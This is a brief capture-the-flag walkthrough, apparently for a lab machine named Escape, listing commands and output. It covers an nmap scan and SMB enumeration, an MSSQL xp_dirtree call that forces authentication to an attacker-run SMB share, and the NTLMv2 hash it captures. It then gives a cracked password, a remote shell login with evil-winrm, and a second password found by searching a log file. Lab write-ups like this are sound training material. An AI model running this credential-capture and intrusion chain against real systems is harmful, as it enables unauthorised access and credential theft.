❌Escape

MSSQL | NTLMv2 | Leaking Certificate |

nmap -A -Pn -T5 10.10.11.202 > escape.txt

Nmap scan report for 10.10.11.202
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1433/tcp open  ms-sql-s
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

smbclient -N -L 10.10.11.202

smbclient -N //10.10.11.202/Public

xp_dirtree '\10.10.14.111\fg0x0'

impacket-smbserver fg0x0 . -smb2support

sql_svc::sequel:aaaaaaaaaaaaaaaa:a67d3a6c2bc61d49438f83e8cb850d79:010100000000000080be93d2de50d901c497e13ee4bcfbb30000000001001000440063004b0064004a0053005500490003001000440063004b0064004a00530055004900020010006400470049007700520064004400530004001000640047004900770052006400440053000700080080be93d2de50d90106000400020000000800300030000000000000000000000000300000f26169eb30bf0eac34d3f6ff79ec092da66f9ebba85a0e852ac070ebeec4957d0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310031000000000000000000

cracked password: REGGIE1234ronnie ( sql_svc )

evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie

Select-String "Password" ERRORLOG.BAK

Username: Ryan.Cooper

Password: NuclearMosquito3

PreviousSupport NextFlight

Last updated 10 months ago